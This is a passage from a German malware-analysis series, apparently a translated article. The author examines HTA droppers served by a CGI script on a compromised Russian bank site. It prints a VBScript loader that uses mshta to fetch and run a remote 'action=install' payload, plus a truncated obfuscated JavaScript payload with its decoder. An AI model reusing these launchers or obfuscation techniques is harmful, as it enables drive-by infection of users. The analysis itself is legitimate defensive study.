Seite 3: Schädlingen auf der Spur, Teil 5

Inhaltsverzeichnis

Wenn man die Ausgabe dieses CGI-Skripts mit dem Parameter "action=click" holt, erhält man das Folgende:

<HTML><HEAD><TITLE>Universal Plugin pre-Installer</TITLE>
<HTA:APPLICATION id=PlugInst
APPLICATIONNAME="Plugin pre-Installer"
SHOWINTASKBAR=NO
CAPTION=YES
SINGLEINSTANCE=YES
MAXIMIZEBUTTON=NO
MINIMIZEBUTTON=NO
WINDOWSTATE=MINIMIZE
/></HEAD>
<OBJECT id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B">
</OBJECT>
<BODY>
<SCRIPT language="VBScript">
EP=document.location.href
j=InStrRev(EP,"/",-1,1)
EP=Left(EP,j)
If InStr(EP,"cgi-bin")<>0 Then
CGIP=EP & "pscounter.cgi"   
Else
CGIP=EP & "cgi-bin/gen/pscounter.cgi"   
End If  
IP= CGIP & "?action=install" 
Set oSA = CreateObject("Shell.Application")
On Error Resume Next
oSA.ShellExecute "mshta",IP
If Err.number <> 0 Then
Cmd="mshta " & IP
MSplay.Run (Cmd),1,FALSE        
End If
self.Close
</SCRIPT>
</BODY></HTML>

Ich hab nie behauptet, ein JavaScript-Guru zu sein (warum sollte man sowas überhaupt öffentlich behaupten?), aber es sieht ganz so aus, als ob uns dieses kleine Juwel wieder zuück zum Anfang führt -- nur diesmal mit dem Parameter "action=install".

Mit waghalsiger Unbekümmertheit, unter völliger Mißachtung meiner persönlichen Sicherheit und nach einem halben Liter Mountain Dew kehrte ich zu dieser russischen Bank zurück, auf der Suche nach mehr Action.

(Vergesst nicht: Ich bin 3 Meter groß und kugelfest. Ihr nicht. Probiert es also nicht.)

<HTML><HEAD><TITLE>Universal Plugin pre-Installer</TITLE>
<HTA:APPLICATION id=PlugInst
APPLICATIONNAME="Plugin Installer"
SHOWINTASKBAR=NO
CAPTION=YES
SINGLEINSTANCE=YES
MAXIMIZEBUTTON=NO
MINIMIZEBUTTON=NO
WINDOWSTATE=MINIMIZE/>
</HEAD>
<OBJECT id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B">
</OBJECT>
<OBJECT id="MSmedia" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228">
</OBJECT>
<BODY>
<SCRIPT LANGUAGE="JavaScript">
d="=UFYUBSFB je>Nbjo`IUB?=IUNM?=IFBE?=IUB;BQQMJDBUJPOR#QYQ
8#OBNF>QYQ TIPXJOUBTLCBS>OP
DBQJ#>ZFTD#JOHMFJOTUBODF8#NBYJNJ[FCVUUPOZ#NJO7#XJOEPXTUBUF>C#
0t$0#%CPEZ+#TDSJQU? gvodujpo
Em(Sq-Mo-St-emm*|usz+#tBY>voftdbqf(%52EPEC%3fTusfbn*<wbs pT>ofx
BdujwfYPckfdu(tBY*<
 
--<tonnenweise Zeichensalat entfernt>";
 
l='\0\t\n\r- !"#$%&\'()*+,-./0123456789:;<=>?@
ABCDEFGHIJKLMNOPQRSTUVWXYZ[\134]^_`abcdefghijklmnopqrstuvwxyz{|}~';
s='';
for (i=0;i<d.length;i++){b=d.charAt(i);a=l.indexOf(b);if (a==1) a=9;if
(a==2) a=10;if (a==3) a=13;if (a==4) a=34;if (a<=31 &
a>=14){off=s.length-(l.indexOf(d.charAt(++i))-36+90*(l.indexOf(d.charAt(++i))-35))-1;
lp=off+a-14+4;s=s+s.substring(off,lp);}else
if (a>0){ if (a>=41) a=a-1; s=s+l.charAt(a);} else
s=s+b;}document.writeln(s);
</SCRIPT></body></html>

Verdammt... Das sieht aus wie schon mal verdauter Buchtstabensalat (Anmerkung: Das oben ist keine exakte Wiedergabe der heruntergeladenen Datei. Einige der Zeichen des Originals lassen sich hier nicht richtig darstellen. Sorry.)